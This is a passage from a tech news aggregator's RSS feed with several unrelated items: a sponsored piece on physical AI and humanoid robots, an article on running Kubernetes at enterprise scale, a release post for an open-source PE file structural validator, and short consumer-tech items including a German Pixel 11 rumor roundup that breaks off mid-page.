<p>Physical AI researchers are exploring future-proof strategies to develop intelligent, safe humanoid robots that can collaborate with humans, undertake humanly impossible tasks, and handle routine tasks more efficiently.</p>



<p>The strongest case for AI-powered humanoid robots is that they complement human power. A <a href="https://reports.weforum.org/docs/WEF_Physical_AI_Powering_the_New_Age_of_Industrial_Operations_2025.pdf" target="_blank" rel="noreferrer noopener">World Economic Forum (WEF)</a> report projects shifts in work roles. Humanoid robots increase the workforce, take over repetitive, strenuous, and boring roles, allowing humans to pursue more interesting career paths.</p>



<p>This way, superintelligent humanoid robots will lead sector-wide transformations beyond current imagination and uniquely transform the world.</p>



<p>In theory, it creates the ideal conditions for an improved global economy and a higher quality of life. This theory is challenged by the dystopian vision of a machine-dominated world in which humans become less relevant. However, history suggests otherwise. Every major wave of automation, from the industrial revolution to the rise of computers, initially sparked fears of human redundancy. Yet each ultimately created more opportunities than it eliminated.</p>



<h2 class="wp-block-heading">Super-human advancements with physical AI</h2>



<p>In ideal operations, physical AI will serve as a lever for humans as well. While progress in robotics is loudest, efforts to directly augment human abilities with physical AI are also yielding remarkable results. Brain-computer interfaces can now <a href="https://techcrunch.com/sponsor/tether/tether-is-setting-the-standards-forbrain-to-text-speech-decoding-withai-augmented-bci-implants/" target="_blank" rel="noreferrer noopener">accurately decode speech in paralyzed and speech-impaired</a> individuals through intracortical implants that detect brain activity. And this is only a ‘start’. Projections from leaders in this space give insight into the trajectory of this technology.</p>



<p>In a recent <a href="https://www.youtube.com/watch?v=rKZ3LPLF2-A" target="_blank" rel="noreferrer noopener">fireside chat</a> with NEURA Robotics CEO and founder David Reger, Tether CEO Paolo Ardoino noted, <em>“the evolution of robotics that Neura is making is going to allow testing and building of a framework[…] where the real impact is in the real world. Everything starts digital, but to see the true potential, we will see robots roaming the streets, helping people, and being part of society. It has to happen safely, it has to be transparent.”</em></p>



<p>Physical AI products designed for direct human integration are being developed differently, with a focus on ergonomics, a minimalist aesthetic, and performance. <a href="https://tether.io/evo/" target="_blank" rel="noreferrer noopener">EVO</a>, Tether’s arm leading the charge for human advancement through intelligent technologies, also shared plans for non-invasive implants that maintain high productivity and offer greater composability.</p>



<p>Technologies like these will allow humans to leverage high-level physical AI technologies to attain the same technical abilities as humanoid robots and outperform them by combining machine and raw human intelligence.</p>



<h2 class="wp-block-heading">AI robotics in non-user-controlled infrastructures</h2>



<p>Resource efficiency, data sovereignty, and surveillance are some of the biggest ethical considerations of Physical AI after safety and responsibility. The infrastructure line-up for Software and Physical AI relies heavily on managed systems, blurring the lines of control and governance.</p>



<p>Who is really in charge? The end user, developer, or proprietors of the centralized infrastructure that powers the product? The result is a product with multiple points of failure, disruptions, and most importantly, operational risks.</p>



<p>Physical AI solutions will be used by billions of people worldwide; they should therefore not be built on limited, slow, and centralized infrastructures. This necessitates localized or truly decentralized AI solutions. Local-first AI solutions like <a href="https://qvac.tether.io/" target="_blank" rel="noreferrer noopener">Tether’s QVAC</a> also prioritize resource efficiency, since users are expected to provide the core infrastructure. QVAC is a modular, highly efficient, local-first AI platform that runs anywhere. Tether regards it as the invisible intelligence engine of the 21st century.</p>



<h2 class="wp-block-heading">Open-sourcing and aligning intelligent robots for co-existence with humans</h2>



<p>Yann LeCun, Chief AI scientist at Meta, <a href="https://observer.com/2025/07/metas-yann-lecun-defends-open-source-a-i-amid-geopolitical-tension/" target="_blank" rel="noreferrer noopener">notes</a> that open-sourcing AI development is the answer to the most pressing ethical challenges of AI applications. According to LeCun:</p>



<p><em>“The magic of open research is that you accelerate progress by involving more people[…] the biggest danger of AI isn’t ‘bad behavior’ […] It’s that every digital interaction in our future will be mediated by AI. In that world, diverse open-source systems let users choose their own biases.”</em></p>



<p>Open-sourced (systemic decentralization) and local-first (Infrastructural decentralization) solutions are the only path to developing ethically aligned Physical AI capable of co-existing with humans as intended. A successful physical AI solution is expected to tick the check boxes of safety, resource efficiency, true user control, and tamper-proofness. To do this, it must embrace transparent development procedures and function without gatekeepers.</p>



<p></p>



<p><strong>Learn how </strong><a href="https://tether.io/evo/" target="_blank" rel="noreferrer noopener"><strong>Tether EVO</strong></a><strong> is building resilient technology built on fairness, inclusivity, and systems with zero points of failure.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 95 detected installers by looking for magic words and hoping for the best]]></title>
<description><![CDATA[If your name's not on the list, you're... probably not a setup program]]></description>
<link>https://tsecurity.de/de/3656477/it-nachrichten/windows-95-detected-installers-by-looking-for-magic-words-and-hoping-for-the-best/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656477/it-nachrichten/windows-95-detected-installers-by-looking-for-magic-words-and-hoping-for-the-best/</guid>
<pubDate>Thu, 09 Jul 2026 11:16:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If your name's not on the list, you're... probably not a setup program]]></content:encoded>
</item>
<item>
<title><![CDATA[Practical challenges in managing Kubernetes at enterprise scale]]></title>
<description><![CDATA[The first time I used Kubernetes in an enterprise setting, I understood the hype. It gives every team the same way to package, deploy and run their apps. No more custom scripts or unique deployment hacks, just one control plane to rule them all. And really, that’s why it’s so popular with big com...]]></description>
<link>https://tsecurity.de/de/3656431/ai-nachrichten/practical-challenges-in-managing-kubernetes-at-enterprise-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656431/ai-nachrichten/practical-challenges-in-managing-kubernetes-at-enterprise-scale/</guid>
<pubDate>Thu, 09 Jul 2026 11:03:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The first time I used Kubernetes in an enterprise setting, I understood the hype. It gives every team the same way to package, deploy and run their apps. No more custom scripts or unique deployment hacks, just one control plane to rule them all. And really, that’s why it’s so popular with big companies: <a href="https://kubernetes.io/">Kubernetes</a> is an open-source system for automating deployment, scaling and management of containerized applications. It says so right on the box, and that’s what people want. But here’s the truth: Kubernetes doesn’t erase operational headaches. It just moves them around.</p>



<p>When your Kubernetes install is small, it feels like rocket fuel for engineers. At enterprise scale, though, suddenly it’s about governance, not just engineering. The game is no longer “Can we get this container running?” It’s “How do hundreds of engineers roll out their stuff safely, consistently, securely and without breaking the bank or burning out the platform team?”</p>



<p>This is where the fun really starts.</p>



<h2 class="wp-block-heading">YAML isn’t the enemy</h2>



<p>Folks new to Kubernetes obsesses over manifests, Helm charts, namespaces, ingress rules, deployments, all that stuff. But they’re not the hardest part once you start scaling. The real beast is standardization.</p>



<p>Every big company I’ve seen ends up with teams going their own way. One group writes beautiful deployment templates. Someone else copies and pastes from a two-year-old manifest. Some folks set resource requirements properly. Others skip them entirely. One team sticks to a strong naming convention, and someone else throws together random namespaces and service accounts that make sense only to them. Individually, this more or less works. At scale, when the whole platform has to operate like one system, it’s a mess.</p>



<p>That’s why I’ll say it: you don’t just need a Kubernetes cluster. You need a paved road. This would involve ensuring that there are approved templates, good deployment patterns, observability, security controls as defaults, good issue escalation processes and accountability.</p>



<p>There is no need for developers to be Kubernetes experts just to release their services. The best enterprise Kubernetes setups work like real products. They let application teams self-serve but never let anyone veer off road without good reason.</p>



<h2 class="wp-block-heading">RBAC: necessary, but never enough</h2>



<p>Security is paramount. Kubernetes supports <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">role-based access control (RBAC)</a>, so on paper you can control who does what. In practice, in a big company, RBAC gets confusing fast.</p>



<p>The issue isn’t that engineers ignore security. It’s that permissions grow over time. You need a quick fix during an incident, so you give a service account more access. Maybe a team needs cluster-wide rights for a migration. That “just for now” permission sticks around because no one cleans it up. Month by month, the gap widens between what a workload should do and what it’s actually allowed to do. The only thing that works long-term: treat RBAC as a living thing, not a one-time checklist. Review it. Test it. Stick to least privilege. Service accounts get only what they need. Cluster-admin rights? Rare. Expiring exceptions. Set permissions as code so changes aren’t invisible.</p>



<p>Same story with workload security. Kubernetes brings you <a href="https://kubernetes.io/docs/concepts/security/pod-security-standards/">Pod Security Standards</a>. There is baseline, restricted and privileged profiles, so everyone speaks the same language. But simply setting a standard isn’t enough. We’d also need things like admission controls, image scanning, runtime monitoring and audit trails.</p>



<p>Honestly, the NSA/CISA Kubernetes Hardening Guidance is still gold. Scan containers and pods. Run workloads as locked down as possible. Use strong authentication. Separate networks. Set up solid logging. These ideas sound obvious until you see what happens when your organization scales without good ops.</p>



<h2 class="wp-block-heading">Network policies: where “it should work” meets reality</h2>



<p>Kubernetes networking can trip up even the best teams. Engineers often think different namespaces mean automatic isolation between apps. Not true.</p>



<p><a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/">Kubernetes network policies</a> decide which pods can talk to which, but the policies only matter if your networking plugin actually enforces them. I’ve seen a lot of teams write network controls that look great in YAML but don’t work, because the underlying network just ignores them. Security validation beats documentation every time. If two namespaces shouldn’t talk, test it. If a workload only needs access to a specific backend, check it. If only specific ingress is allowed, make sure nothing else gets through.</p>



<p>At scale, your Kubernetes security has to prove itself. “We have a policy” means nothing unless the platform can show the policy actually works.</p>



<h2 class="wp-block-heading">Resource management becomes all about money</h2>



<p>One of the biggest challenge is resource allocation. Kubernetes lets you set CPU and memory limits, and sure, there are official docs. But getting these numbers right is tough.</p>



<p>Set them too low, and your workload might get throttled or evicted under load. Set them too high, and you’re paying for unused infrastructure. That barely registers on a small cluster, but when you’re running thousands of pods? That’s cloud bills gone wild.</p>



<p>This is where Kubernetes ops and FinOps meet. Platform teams have to know who’s burning through which resources, what’s over-provisioned or flying blind, and where the real money goes. ResourceQuota helps keep things in check, but quotas alone don’t hold people accountable.</p>



<p>The culture shift is moving from “the cluster has spare capacity” to “every service has an owner, a cost profile and a plan for staying lean.” Teams should understand their infrastructure bill. Platform teams need dashboards that point out waste. Engineering leaders need to care about efficiency, not just hear from finance when things go off the rails.</p>



<h2 class="wp-block-heading">Autoscaling isn’t a magic trick</h2>



<p>The Horizontal Pod Autoscaler is handy. It adjusts your workloads automatically to match demand. But don’t overestimate it. Most real-world services don’t scale simply by CPU or memory. Sometimes a service hits latency limits before CPU usage spikes. Workers chewing through queues? You care more about backlog size. Machine learning? Maybe it’s all about GPU use or loading time. Customer-facing apps? You want to be scaled up before traffic hits, not scramble after users start complaining.</p>



<p><br>So autoscaling isn’t just a box you check. It’s a feedback loop, and it only works if you use the right signals. Sometimes CPU is enough. Sometimes you need to scale on queue length, request rate, latency or something totally custom.</p>



<p>Then there’s node autoscaling to provision infrastructure in response to demand. On paper, it just works. In real life, it runs into startup delays, availability zones, quotas, cloud provider quirks and pod disruption budgets. Scale pods faster than nodes? Users still see delays.</p>



<p>Test autoscaling like you test your app. Load-test it, break it, see what happens after an incident. Otherwise, you’ll find the limits when it hurts most.</p>



<h2 class="wp-block-heading">Observability doesn’t matter unless it answers questions</h2>



<p>Kubernetes has mountains of data. Things like  logs, metrics, traces, events, audits, deployment history, container restarts, control plane noise, you name it. The real challenge isn’t collecting info, but actually it’s making sense of it. The CNCF and others have best practices for logging and telemetry, like centralizing logs and not leaking secrets. Those matter, but at the end of the day, engineers need answers, not just data. When something breaks, no one’s asking, “Is Kubernetes alive?” They want to know what changed. Did something roll out? Did a pod crash? Did autoscaling fire too late? Was a node unhealthy, a secret rotated, a network policy too tight, a downstream DB choking?</p>



<p>Observability should line up with real operational questions and not just ticking boxes for logs, or metrics. Dashboards need to match service ownership. Alerts need to mean something to end users. Telemetry should connect to deployments and incidents. Measure how quickly engineers spot the root cause, not just that you have the data somewhere.</p>



<p>CNCF talks about newer models of unified telemetry and proactive troubleshooting for a reason. All the dashboards in the world don’t help when your team has to play detective during an outage.</p>



<h2 class="wp-block-heading">Upgrades: Don’t wing it</h2>



<p>Kubernetes upgrades catch people out. The CNCF Maturity Model says: Kubernetes drops three big releases a year, so maintenance is part of life—not a once-in-a-blue-moon project.</p>



<p>Upgrading at enterprise scale can involve everything: workloads, admission controllers, CI/CD, service mesh, ingress, storage drivers, monitoring, security, custom controllers. <a href="https://kubernetes.io/releases/version-skew-policy/">Version skew policies</a> keep you between the lines, but that’s just the beginning. The real question is: can you test your whole stack?</p>



<p>Good upgrade programs need a repeatable process, staging environments that actually look like production, and clear communication so teams know what to expect. The worst upgrade process is the one that relies on heroes to pull it off at the last second. A strong platform turns upgrades into routine.</p>



<h2 class="wp-block-heading">Reliability: Kubernetes helps, but it doesn’t guarantee it</h2>



<p>Yes, Kubernetes restarts crashed containers, reschedules pods and does rolling deployments. But it doesn’t make a bad app reliable.</p>



<p>A poorly coded app will fail on Kubernetes just like anywhere else. Bad readiness or liveness probes? Your app gets traffic too soon. No graceful shutdown? Requests drop during deploy. Forgot pod disruption budgets? The app goes down during node maintenance. A flaky dependency? It will cascade through your services even if all your pods look healthy.</p>



<p>The mature approach is setting service-level objectives and making reliability a product of both platform and engineering. Cluster health isn’t user experience. That green status page can hide a lot of pain.</p>



<h2 class="wp-block-heading">The platform team is a product team</h2>



<p>Here’s the biggest lesson I’ve picked up is that running Kubernetes at enterprise scale isn’t really about the tech. One cluster? Maybe one expert can handle that. But for a full enterprise platform, you need a product mindset. The platform team serves customers such as engineers, security, compliance, finance and business. Everyone wants something a bit different.</p>



<p>Developers want speed and reliability. Security wants oversight. Finance wants transparency. Compliance wants proof. Ops wants predictability. The business wants all of those.</p>



<p>The platform team has to pull those threads together with APIs, docs, dashboards, paved roads, support and feedback. That also means saying “no” to the unique snowflake patterns that create chaos later. Kubernetes is powerful. But it doesn’t replace organizational discipline. That’s still on the shoulders of engineering leaders. The real challenge at enterprise scale isn’t memorizing every API object. It’s building a system where any team can ship safely without needing to be Kubernetes experts themselves.</p>



<p>When you reach that point, Kubernetes stops being just a cluster. It becomes your platform.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.infoworld.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PE structural validation notes (delay-load, exports, VS_VERSIONINFO) + IOCX v0.7.5 release]]></title>
<description><![CDATA[Publishing a release of IOCX (open-source PE structural validator, MPL-2.0) and posting some format-level notes alongside it. Write-up: PE structural validation: format ambiguities and decoder design The notes catalogue four categories of PE specification ambiguity encountered during decoder work...]]></description>
<link>https://tsecurity.de/de/3655754/malware-trojaner-viren/pe-structural-validation-notes-delay-load-exports-vsversioninfo-iocx-v075-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655754/malware-trojaner-viren/pe-structural-validation-notes-delay-load-exports-vsversioninfo-iocx-v075-release/</guid>
<pubDate>Thu, 09 Jul 2026 04:03:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Publishing a release of IOCX (open-source PE structural validator, MPL-2.0) and posting some format-level notes alongside it.</p> <p><strong>Write-up:</strong> <a href="https://gist.github.com/malx-labs/ce30872e5db790f25c964b4027b2b7ee">PE structural validation: format ambiguities and decoder design</a></p> <p>The notes catalogue four categories of PE specification ambiguity encountered during decoder work, with focus on delay-load imports (the richest surface). Structured as: format description grounded in the spec --&gt; the ambiguity described precisely --&gt; what IOCX chose to do about it. There are no unverified claims about how other parsers behave, however cross-tool measurement is queued as follow-up work.</p> <p>Topics covered:</p> <ul> <li><strong>Delay-load imports:</strong> v1 vs v0 attribute mode, INT/IAT parallel-array interpretation and mismatch handling, descriptor array termination when declared-size and terminator signals disagree</li> <li><strong>Exports:</strong> ENPT sort discipline (byte-wise per spec) and forwarder grammar validation</li> <li><strong>VS_VERSIONINFO:</strong> nested length prefixes, DWORD alignment enforcement, signature validation for VS_FIXEDFILEINFO, StringTable key format</li> <li><strong>Resource hierarchy:</strong> Type -&gt;Name -&gt; Language depth expectations</li> </ul> <p><strong>IOCX v0.7.5 additions relevant to structural analysis</strong>:</p> <p>Four new parser/validator pairs, 24 new reason codes with priority-resolved sub-reasons via <code>details["reason"]</code>. Delay-load specifically emits:</p> <ul> <li><code>DELAY_IMPORT_ATTRIBUTES_LEGACY_VA_MODE</code> : v0 mode detected (obsolete, spec-permitted, requires VA-to-RVA conversion for correct interpretation)</li> <li><code>DELAY_IMPORT_INT_IAT_MISMATCH</code> : parallel arrays disagree on length</li> <li><code>DELAY_IMPORT_TABLE_TRUNCATED</code> with distinct sub-tags for each termination cause (<code>delay_import_descriptor_unterminated</code>, <code>_truncated</code>, <code>_max_exceeded</code>, <code>_read_failed</code>)</li> <li><code>DELAY_IMPORT_DLL_NAME_INVALID</code> with priority-resolved sub-reasons</li> <li><code>DELAY_IMPORT_ENTRY_INVALID</code> for per-import malformations (ordinal_zero, name_unterminated, name_not_printable, etc.)</li> </ul> <p><strong>Design notes:</strong></p> <ul> <li>Byte-level parsing via <code>struct.unpack_from</code> on <code>pe.get_data()</code> byte slices; no reliance on pefile's lazy attribute interpretation</li> <li>Bounded reads throughout (descriptor arrays capped at 4096, imports per descriptor at 16384, DLL name scan at 512 bytes, IMAGE_IMPORT_BY_NAME scan at 1024)</li> <li>Parsers never raise on malformed input; failures produce tombstone tags in <code>errors[]</code> and <code>truncations[]</code> lists</li> <li>PE32+ vs PE32 thunk sizing determined once from `OPTIONAL_HEADER.Magic` and threaded through the parse</li> </ul> <p><strong>Optional Header enrichment relevant to security-posture analysis:</strong></p> <ul> <li><code>dll_characteristics_flags</code>: decoded flag list (DYNAMIC_BASE, NX_COMPAT, GUARD_CF, HIGH_ENTROPY_VA, etc.)</li> <li><code>dll_characteristics_unknown_bits</code>: hex string for any bits outside the known-flag mask</li> <li>Stack and heap sizing (reserve + commit, 64-bit on PE32+)</li> <li><code>win32_version_value</code>, <code>loader_flags</code> exposed raw</li> </ul> <p><strong>Verification:</strong></p> <p>Delay-load parser cross-checked byte-exact against <code>dumpbin /imports</code> on <code>mspaint.exe</code> : 107 imports from gdiplus.dll with agreement on names, hints, IAT addresses, ordering, and bound state.</p> <p>1370 tests at 100% line and branch coverage on new modules. Defensive <code>struct.error</code> paths covered via monkeypatched injection.</p> <p><strong>Performance</strong> ~14ms typical PE, ~1ms on adversarial minimal PE.</p> <p><strong>Deferred:</strong></p> <ul> <li>TLS Directory parser and validator (next release)</li> <li>Single-anomaly fixtures for each new reason code (~25 planned, including negative controls for the ambiguities described in the Gist)</li> <li>Cross-tool measurement study using the fixtures</li> </ul> <p><strong>Repo:</strong> <a href="https://github.com/iocx-dev/iocx">https://github.com/iocx-dev/iocx</a></p> <p><strong>CHANGELOG:</strong> <a href="https://github.com/iocx-dev/iocx/blob/main/CHANGELOG.md">https://github.com/iocx-dev/iocx/blob/main/CHANGELOG.md</a></p> <p><strong>Reason codes reference:</strong> <a href="https://github.com/iocx-dev/iocx/blob/main/docs/specs/reason-codes.md">https://github.com/iocx-dev/iocx/blob/main/docs/specs/reason-codes.md</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/iocx_dev"> /u/iocx_dev </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqt6i9/pe_structural_validation_notes_delayload_exports/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqt6i9/pe_structural_validation_notes_delayload_exports/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[America’s cheapest new EV is smaller than a ping-pong table and tops out at 19mph]]></title>
<description><![CDATA[When searching for an affordable electric vehicle these days, there are always tradeoffs. How much range are you willing to sacrifice, how much leg room and storage space, how many features, in the pursuit of that magic sticker price that won't break the bank? The Fiat Topolino is basically the u...]]></description>
<link>https://tsecurity.de/de/3655106/it-nachrichten/americas-cheapest-new-ev-is-smaller-than-a-ping-pong-table-and-tops-out-at-19mph/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655106/it-nachrichten/americas-cheapest-new-ev-is-smaller-than-a-ping-pong-table-and-tops-out-at-19mph/</guid>
<pubDate>Wed, 08 Jul 2026 20:02:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When searching for an affordable electric vehicle these days, there are always tradeoffs. How much range are you willing to sacrifice, how much leg room and storage space, how many features, in the pursuit of that magic sticker price that won't break the bank? The Fiat Topolino is basically the ultimate embodiment of those tradeoffs. […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Pixel 11: Die wichtigsten Leaks und Gerüchte]]></title>
<description><![CDATA[Das Pixel 11 gehört zweifellos zu den am meisten erwarteten Android-Smartphones des Jahres 2026 – und das aus gutem Grund. Auch wenn man argumentieren könnte, dass es sich nicht um eine so umfassende Neugestaltung handelte wie bei den jüngsten iPhone-17-Modellen von Apple, umfasst die Pixel-10-Re...]]></description>
<link>https://tsecurity.de/de/3654494/it-nachrichten/google-pixel-11-die-wichtigsten-leaks-und-geruechte/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654494/it-nachrichten/google-pixel-11-die-wichtigsten-leaks-und-geruechte/</guid>
<pubDate>Wed, 08 Jul 2026 15:47:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das Pixel 11 gehört zweifellos zu den am meisten erwarteten Android-Smartphones des Jahres 2026 – und das aus gutem Grund. Auch wenn man argumentieren könnte, dass es sich nicht um eine so umfassende Neugestaltung handelte wie bei den jüngsten <a href="https://www.macwelt.de/article/2915599/test-iphone-17.html" target="_blank" rel="noreferrer noopener">iPhone-17-Modellen von Apple</a>, umfasst die <a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel-10-Reihe</a> dennoch eine Reihe herausragender Geräte, die viele gerne als ihr Alltagsgerät nutzen.</p>



<p>Der verbesserte Tensor-G5-Chipsatz ermöglichte es, dass mehr von Googles hauseigenen KI-Funktionen in die integrierte Software Einzug hielten. Die Einführung von Pixelsnap bedeutete, dass Android-Fans, die schon lange neidisch auf Apples Magsafe-Technologie waren, endlich alle Vorteile genießen konnten, die eine Qi2-Magnetverbindung mit sich bringt.</p>



<p>Diese Verbesserungen ergänzen die üblichen Vorzüge, die wir an Pixel-Smartphones schätzen – nämlich die Art und Weise, wie ihre Kameras Hauttöne in Bildern präzise wiedergeben, sowie die wunderbar übersichtliche Gestaltung von Stock-Android. Genau aus diesem Grund finden sich Pixel-Smartphones regelmäßig in unseren Übersichten zu den <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">besten Smartphones</a> wieder.</p>



<p>Vor diesem Hintergrund sind wir gespannt, in welche Richtung Google mit der Pixel-11-Reihe als Nächstes gehen wird – insbesondere da sich der Wettbewerb durch aktuelle Android-Spitzenmodelle wie das <a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a> und das <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> weiter verschärft, ganz zu schweigen vom <a href="https://www.techadvisor.com/article/2950432/oppo-find-x9-pro-review.html">Oppo Fin</a><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">d</a><a href="https://www.techadvisor.com/article/2950432/oppo-find-x9-pro-review.html"> X9 Pro</a>, das in Sachen Smartphone-Fotografie ein absolutes Kraftpaket ist.</p>



<h2 class="wp-block-heading">Neueste Gerüchte zum Pixel 11</h2>



<p>Alle Pixel-11-Modelle könnten eine umfassende Kameraüberarbeitung erfahren: Sowohl das Pixel 11 als auch das 11 Pro Fold sollen mit einem neuen 50-Megapixel-Hauptobjektiv ausgestattet werden, während das Pixel 11 Pro und das 11 Pro XL komplett neue Haupt- und Teleobjektive erhalten werden. Nachdem Gerüchte über eine Face-ID-Alternative <a href="https://www.androidauthority.com/google-pixel-11-face-unlock-3494465/" target="_blank" rel="noreferrer noopener">kursierten</a>, scheint es nun so, als würde diese Funktion auf die Modelle des nächsten Jahres verschoben werden.</p>



<h2 class="wp-block-heading toc">Wann wird das Google Pixel 11 erscheinen?</h2>



<p>Die Google-Pixel-11-Reihe wird voraussichtlich im <strong>August 2026</strong> auf den Markt kommen, wahrscheinlich im Rahmen der jährlichen Sommerveranstaltung von Google. Der offizielle Termin dafür ist der <strong>12. August 2026.</strong></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ade1c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 1" class="wp-image-2457624" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p><a href="https://www.androidauthority.com/exclusive-pixel-10a-pixel-11-codename-3516163/" target="_blank" rel="noreferrer noopener">Gerüchten</a> zufolge soll die Pixel-11-Serie tatsächlich erneut bis zu vier Geräte umfassen. Sollte Google wie in den letzten Jahren verfahren, wird das Pixel 11 Pro Fold später auf den Markt kommen als die anderen Modelle.</p>



<p>Diese Dokumente bestätigen die Codenamen für die Pixel-Geräte des Jahres 2026, wobei die Pixel-11-Serie Namen mit Bärenbezug trägt, wie „cubs“ für das Standardmodell Pixel 11, „grizzly“ für das Pixel 11 Pro, „kodiak“ für das Pixel 11 Pro XL und „yogi“ für das Pixel 11 Pro Fold.</p>



<p>Früher brachte Google neue Smartphones im Oktober auf den Markt, hat den Termin jedoch bei den letzten beiden Generationen vorverlegt. Zum Vergleich finden Sie hier die Erscheinungsdaten der vorherigen Generationen:</p>



<ul class="wp-block-list">
<li>Google Pixel 10: August 2025</li>



<li>Google Pixel 9: August 2024</li>



<li>Google Pixel 8: Oktober 2023</li>



<li>Google Pixel 7: Oktober 2022</li>



<li>Google Pixel 6: Oktober 2021</li>
</ul>



<p><strong>Aktuell bester Preis: Google Pixel 10 Pro</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>699,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FHL2XPXS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FHL2XPXS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="699,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 699,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>739,00 €</span>						</div>
						<div>
